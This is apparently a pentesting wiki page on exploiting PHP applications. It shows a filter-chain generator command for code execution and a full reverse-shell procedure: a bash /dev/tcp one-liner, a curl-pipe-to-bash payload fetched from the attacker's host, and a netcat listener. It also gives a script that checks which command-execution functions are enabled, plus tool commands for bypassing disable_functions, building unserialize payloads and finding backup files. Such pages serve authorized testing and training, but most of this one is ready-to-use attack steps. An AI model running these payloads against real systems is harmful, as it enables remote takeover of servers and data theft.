PHP

PHP Filters Chain

Exploitation

PHP Filter Chain Generator is available so we can use it.

python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'

We only have to do is paste the above generated payload to /?page=<genrated_chain>.

Reverse Shell

First create a shell script named "revshell" in local machine.

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

Then create a chain using a generator. Replace the ip address with your own.

# `<?= ?>` is a shorthand for `<?php echo ~ ?>`
python3 php_filter_chain_generator.py --chain '<?= `curl -s -L 10.0.0.1/revshell|bash` ?>'

We need to start a web server that hosts the shell script, and also start a listener for receiving the reverse connection.

# terminal 1
sudo python3 -m http.server 80

# terminal 2
nc -lvnp 4444

Now access to /?page=<generated_chain>. We can get a shell.

References

Synacktiv

RCE Function Check

If you can execute PHP on a target but want to figure out which functions are available to you to execute commands on the host, you can use this script.

Link to gist: https://gist.github.com/AppSecExplained/aab510eead65c9c95aa20a69d89c9d2a

<?php

$test_command = 'echo "time for some fun!"';
$functions_to_test = [
    'system',
    'shell_exec',
    'exec',
    'passthru',
    'popen',
    'proc_open',
];

function test_function($func_name, $test_command) {
    if (function_exists($func_name)) {
        try {
            $output = @$func_name($test_command);
            if ($output) {
                echo "Function '{$func_name}' enabled and executed the test command.\n";
            } else {
                echo "Function '{$func_name}' enabled, but failed to execute the test command.\n";
            }
        } catch (Throwable $e) {
            echo "Function '{$func_name}' enabled, but an error occurred: {$e->getMessage()}\n";
        }
    } else {
        echo "Function '{$func_name}' disabled or not available.\n";
    }
}

foreach ($functions_to_test as $func) {
    test_function($func, $test_command);
} ?>

GitHub - TarlogicSecurity/Chankro: Herramienta para evadir disable_functions y open_basedirGitHub

Bypass disable_functions and open_basedir

python2 chankro.py --arch 64 --input rev.sh --output chan.php --path /var/www/html

Unserialize PHP Payload generator https://github.com/ambionics/phpggc
Backup Artifacts

GitHub - mazen160/bfac: BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.GitHub

bfac --url http://example.com/test.php

PreviousNoSQL (MongoDB, CouchDB)NextPHP hash_hmac Bypass

Last updated 1 month ago

hashtagPHP Filters Chain

hashtagExploitation

hashtagReverse Shell

hashtagReferences

hashtagRCE Function Check

PHP Filters Chain

Exploitation

Reverse Shell

References

RCE Function Check